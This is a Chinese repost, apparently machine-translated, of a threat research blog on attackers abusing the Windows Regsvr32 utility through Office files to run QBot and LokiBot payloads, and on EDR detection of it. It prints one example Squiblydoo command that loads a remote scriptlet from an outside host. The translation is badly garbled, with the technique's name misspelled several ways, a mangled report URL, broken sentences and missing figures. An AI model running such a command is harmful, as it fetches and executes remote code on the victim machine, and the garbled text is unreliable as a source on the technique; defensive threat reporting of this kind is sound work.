首页 > 安全 > 正文

攻击者越来越多地采用Regsvr32实用程序执行通过办公室文件

最后更新 :2022.02.24

UPTYCS威胁研究团队一直在通过各种类型的Microsoft Office文件来观察Regsvr32.exe的利用率增加。

包括妥协指标(IOC)的完整报告可在此处提供:

https://www.uptycs.com/blog/Attackers-inCreasoly- adopting-regsvr32-实用程序执行通行证 - 文档

在我们对这些恶意软件样本的分析期间,我们已识别出一些恶意软件样本属于QBOT和LokiBoT尝试执行.ocx文件。

本博客详述了Regsvr32.exe以及我们的威胁情报系统和Uptycs EDR检测的见解。

Regsvr32实用程序和QuignyDoo技术

Regsvr32是微软 - 签名命令行实用程序在Windows中,允许用户注册和取消注册DLL(动态链接库)。通过注册DLL文件,信息是一个dded到中心目录(注册表),以便窗口可以使用它。这使得其他程序更容易利用DLL的功能。

威胁演员可以使用Regsvr32来加载COM Scriptlet来执行DLL。此方法不会对注册表进行更改,因为COM对象实际上不是实际注册但执行。这种技术通常被称为 qubibydoo技术允许威胁演员在攻击链的执行阶段旁路旁边的应用程序白名单。

示例regsvr32.exe / s / n / u / e:http://lyncdiscover.2bunny.com/autodiscover scrobj.dll

通过Uptycs EDR提供的检测和检测图如下所示(参见图1)。

图1:Liviblydoo技术

介绍我们的威胁情报系统

使用来自客户遥测的数据和威胁情报系统d d d d,使用文档中的公式下载来自URL的恶意有效载荷。

uptycs edr检测仲裁仪&amp的各种策略和技术中使用的regsvr32的可疑执行; ck框架(防御逃避和分别签名二进制代理执行,并提供父/儿童流程关系,相关性和威胁情报的遥测。

通过UPTYCS EDR提供的检测和检测图如下所示(见图4和5

图4:

图5:图5:登记。OCX文件使用Regsvr32 识别可疑Regsvr32执行

,因为Regsvr32通常用于合法的日常操作,它对传统安全解决方案和安全团队监控构成了挑战这种恶意活动的过程。

- END -

    数据加载中,请稍后...
看更多